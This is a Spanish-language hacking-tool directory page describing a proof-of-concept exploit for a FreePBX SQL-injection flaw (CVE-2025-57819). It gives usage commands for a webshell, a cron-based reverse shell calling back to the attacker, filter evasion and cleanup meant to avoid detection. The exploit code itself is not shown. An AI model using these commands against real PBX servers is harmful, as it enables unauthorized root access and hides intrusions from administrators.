Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5781 — Exploit de prueba de concepto para CVE-2025-57819 en FreePBX: inyección SQL en la API AJAX para ejecutar PHP arbitrario, crear una webshell persistente y lanzar una shell inversa. | Kitploit
Herramientas/GitHubGitHub/jasonbernier/cve-2025-5781
Mecanismos de PersistenciaExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónComando y ControlDesarrollo de Payloads
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

Exploit de prueba de concepto para CVE-2025-57819 en FreePBX: inyección SQL en la API AJAX para ejecutar PHP arbitrario, crear una webshell persistente y lanzar una shell inversa.

Ver Repositorio
15hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de FreePBX CVE-2025-57819

Descripción

Este script explota una vulnerabilidad en versiones de FreePBX anteriores a 16.0.26.0 (CVE-2025-57819), permitiendo a atacantes remotos ejecutar código PHP arbitrario a través de una falla de inyección SQL en el endpoint de la API AJAX. El exploit crea tanto una webshell como una reverse shell de activación automática.

Detalles de la vulnerabilidad

  • CVE: CVE-2025-57819
  • Versiones afectadas: FreePBX < 16.0.26.0
  • Impacto: Ejecución remota de código (RCE)
  • Vector: Inyección SQL en la API AJAX (/admin/ajax.php)

Características

  • Crea una webshell persistente en /pbxshell.php
  • Configura una reverse shell de activación automática a través de una tarea cron
  • Utiliza payloads codificados en Base64 para evadir filtros
  • Limpieza automática de las tareas cron después de la ejecución

Requisitos

  • Python 3.x
  • Librería requests
  • Netcat (para el listener de reverse shell)

Instalación

git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

Uso

python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

Parámetros:

  • -H HOST: Instancia de FreePBX objetivo (p. ej., https://freepbx.example.com)
  • -lhost LHOST: Tu IP para el callback de la reverse shell
  • -lport LPORT: Puerto para la conexión de la reverse shell

Ejemplo:

python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

Flujo del exploit

  1. Envía el payload de inyección SQL para crear una webshell
  2. Espera a que se cree la webshell (~2 minutos)
  3. Crea una reverse shell de activación automática a través de una tarea cron
  4. Inicia el listener de Netcat en el puerto especificado

Uso de la webshell

Después de una explotación exitosa, accede a la webshell mediante:

curl -X GET "http://TARGET/pbxshell.php?cmd=id"

Limpieza

El exploit elimina automáticamente las tareas cron después de la ejecución para evitar la detección.

Notas

  • El script utiliza -- para comentar la sintaxis SQL restante
  • Todos los comandos se ejecutan con privilegios de root
  • Requiere acceso de escritura al directorio /var/www/html/

Referencias

  • CVE-2025-57819
  • Aviso de seguridad de FreePBX
Descargar herramienta